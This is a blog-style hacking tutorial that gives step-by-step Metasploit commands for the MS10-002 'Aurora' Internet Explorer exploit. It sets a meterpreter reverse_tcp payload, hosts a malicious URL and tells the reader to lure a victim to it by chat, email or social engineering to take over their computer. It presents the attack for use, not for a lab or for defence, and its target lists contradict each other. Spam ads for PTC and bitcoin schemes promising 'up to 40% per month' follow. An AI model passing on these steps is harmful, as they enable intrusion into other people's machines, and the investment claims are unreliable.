1

How To Hack Remote PC Using Operation Aurora Attack

What is Metasploit?
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

MS10_002 Aurora Exploit:
Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.

Exploit Targets:
  • Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
  • Operating System: Windows vista, windows 7, windows server 2008

Requirement:

  • Attacker: Metasploit
  • Victim PC: Windows XP

Process:

  1. Open terminal 
  2. Type msfconsole
  3. Use exploit/windows/browser/ms10_002_aurora
  4. Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
  5. Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)
  6. Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)
  7. Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)
  8. Msf exploit (ms10_002_aurora)>exploit
  9. Now an URL you should give to your victim http://192.168.1.4/meeting
  10. Send the link of the server to the victim via chat or email or any social engineering technique.

You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Previous
Next Post »
Best Investment and PTC Sites
Join Now and Start Earning Online
Invest Now and Start Earning
Join Now and Start Earning Online
Join Now and Start Earning Online
RocketRevShare - Instant Realtime Revenue Sharing!
Join Now and Start Earning Online
Join Now and Start Earning Online


Best Bitcoin Minning, Investing and PTC Sites
The most stable Bitcoin earning system in the market
PTC Website That Pays In Bitcoin
High earnings Investmens made easy. Up to 40% per month with cryptocurrency mining. No need in initial investment.
Each investment gets a public profile. Take a look! See the reporting, and how you cashout.
MinuteBTC, The Bridge of Success. We are the Accomplishment of your Purpose.
Scrypt.CC was created to make mining scrypt based coins accessible to everyone without huge upfront costs, no huge electricity bill at the end of the month, no worries with hardware failure, no babysitting the machines 24/7. We take care of all of that for you!